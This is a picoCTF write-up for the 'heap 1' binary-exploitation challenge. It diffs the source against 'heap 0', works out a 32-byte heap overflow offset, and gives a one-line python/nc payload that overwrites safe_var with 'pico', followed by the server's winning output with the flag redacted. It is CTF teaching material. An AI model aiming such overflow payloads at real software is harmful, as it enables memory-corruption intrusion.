100 points
Category: Binary Exploitation
Tags: #binaryexploitation #heap #bufferoverflow
Can you control your overflow?
Binary and source are provided for this challenge.
Inspecting the chall.c source file, it looks to be a modified version of heap 0 challenge, so running a diff between the two to determine the changes :
diff ../heap-0/chall.c chall.c
16c16
< if (strcmp(safe_var, "bico") != 0) {
---
> if (!strcmp(safe_var, "pico")) {
47c47
< printf("\nWelcome to heap0!\n");
---
> printf("\nWelcome to heap1!\n");
88,99c88
< int rval = scanf("%d", &choice);
< if (rval == EOF){
< exit(0);
< }
< if (rval != 1) {
< //printf("Invalid input. Please enter a valid choice.\n");
< //fflush(stdout);
< // Clear input buffer
< //while (getchar() != '\n');
< //continue;
< exit(0);
< }
---
> if (scanf("%d", &choice) != 1) exit(0);
So now our challenge is to cause an overflow but construct the overflow such that the safe_var rewritten with known data, in this case it must be equal to "pico" as seen in the updated conditional statement above.
A minor modification to our existing attack for heap 0 to increase the overflow to add the required safe_var contents in the correct position (offset is again 32-bytes as obtained from the addresses displayed by the challenge executable), such that the input payload;
- Select menu item 2 "Write to Buffer" =
"2\n" - Overflows the
input_databuffer to reach the start of thesafe_varbuffer by outputting 32Acharacters ="A"*32 - Continue the overflow to write
"pico"intosafe_varbuffer, completing the input string to be written ="pico\n" - Select menu item 4 "Print Flag" =
"4\n"
Which yields the following output:
$ echo $(python3 -c 'print("2\n" + "A"*32 + "pico\n4\n")') | nc tethys.picoctf.net 64934
Welcome to heap1!
I put my data on the heap so it should be safe from any tampering.
Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you.
Heap State:
+-------------+----------------+
[*] Address -> Heap Data
+-------------+----------------+
[*] 0x556535d462b0 -> pico
+-------------+----------------+
[*] 0x556535d462d0 -> bico
+-------------+----------------+
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice: Data for buffer:
1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit
Enter your choice:
YOU WIN
picoCTF{...........redacted.............}
Where the actual flag value has been redacted for the purposes of this write up.